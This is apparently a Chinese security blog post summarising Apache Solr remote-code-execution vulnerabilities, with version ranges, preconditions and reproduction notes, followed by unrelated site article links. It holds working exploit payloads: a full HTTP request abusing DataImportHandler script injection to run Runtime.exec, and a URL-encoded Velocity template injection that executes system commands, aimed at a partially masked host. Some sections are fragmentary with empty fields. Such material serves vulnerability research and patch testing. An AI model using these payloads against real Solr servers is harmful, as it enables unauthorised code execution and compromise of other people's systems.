应用安全 - Web框架 - Apache Solr - 漏洞汇总
CVE-2019-12409
Date:
// 类型:
配置不当导致远程代码执行 前置条件:
影响范围:
Solr 8.1. and 8.2. for Linux Solr下载:
https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip Solr安装(默认端口8983):
~/solr-8.2.0/bin# ./solr -e dih -force Kali复现:
Apache solr模板注入漏洞
CVE-2019-0193
Date
类型
远程代码执行 影响范围
Apache Solr < 8.2.0 前置条件
(1)core配置文件config存在
(2)索引库使用了DataImportHandler模块
复现
(1)查core
(2)发包-》弹出计算器窗口
GET /solr/factube_dbc_shard2_replica_n23/dataimport HTTP/1.1
Host: xx.xx.27.22:9002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 522
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=factube_dbc_shard2_replica_n23&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
CVE-2017-12629
Date
类型
远程代码执行 影响范围
漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1,包括:
RedhatSingle Sign-On 7.0
+ Redhat Linux 6.2 E sparc
+ Redhat Linux 6.2 E i386
+ Redhat Linux 6.2 E alpha
+ Redhat Linux 6.2 sparc
+ Redhat Linux 6.2 i386
+ Redhat Linux 6.2 alpha
Redhat JBoss Portal Platform 6
Redhat JBoss EAP 7 0
Redhat Jboss EAP 6
Redhat JBoss Data Grid 7.0.0
Redhat Enterprise Linux 6
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Redhat Collections for Red Hat EnterpriseLinux 0
Apache Solr 6.6.1
Apache Solr 6.6
Apache Solr 6.5.1
Apache Solr 6.5
Apache Solr 6.4
Apache Solr 6.3
Apache Solr 6.2
Apache Solr 6.6
Apache Solr 6.3
Apache Solr 6.0
ApacheLucene 0
SSV ID:SSV-98097
Date:
-- 类型:
修改配置文件参数导致远程代码执行 影响范围:
Apache Solr .x - 8.2.,存在config API版本 Windows下启动Solr
solr.cmd start 前置条件
复现
Solr7.7.2和Solr8.2.0复现失败(POST修改参数失败),Solr7.4.0直接打EXP成功
EXP:
http://xx.xx.27.22:9002/solr/factube_dbc_shard2_replica_n23/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
最新文章
- Pressure-sensitive pores scattered
- Coder-Strike 2014 - Round 1 D. Giving Awards
- Java 生成验证码
- java 16-6 泛型
- 侧滑SilidingMenu ,ViewPager 和,PagerIndicator 冲突
- html5 canvas 笔记一(基本用法与绘制图形)
- PHP 关于回调的用法
- Knockout应用开发指南 第三章:绑定语法(3)
- ASP.NET Web API的HttpController是如何被激活的?
- 使用idea Live Template实现eclipse syso自动提示代码功能
- C#数组和元组
- 【原】cookie小结
- 看懂 ,学会 .NET 事件的正确姿势
- 交给子类: Template Method(模板方法模式)【PHP】
- 从零打卡leetcode之day 2---两数相加
- 人工智能--AI篇
- HADOOP HA 踩坑 - org.apache.hadoop.hdfs.qjournal.protocol.JournalNotFormattedException: Journal Storage Directory /mnt/data1/hadoop/dfs/journal/hdfscluster not formatted
- mysql 1,2,3 关联查询出数字代表的具体意思
- android画板笔锋实现
- Java数据结构和算法(五):队列
热门文章
- SpringMVC 向前台页面传值-ModelAndView
- Python之面向对象之单例模式的四种方式
- 【转】h5页面audio不自动播放问题
- 数据结构-STL序列式容器总结
- SpringBoot 1.X版本设置Https访问以及跨域https访问的问题
- php7魔术方法
- vertical-greenplum
- UVa 1600 Patrol Robot (BFS最短路 &;&; 略不一样的vis标记)
- 186. [USACO Oct08] 牧场旅行 (第三次考试大整理)
- Module not found: Error: Can&#39;t resolve &#39; vue-resource&#39;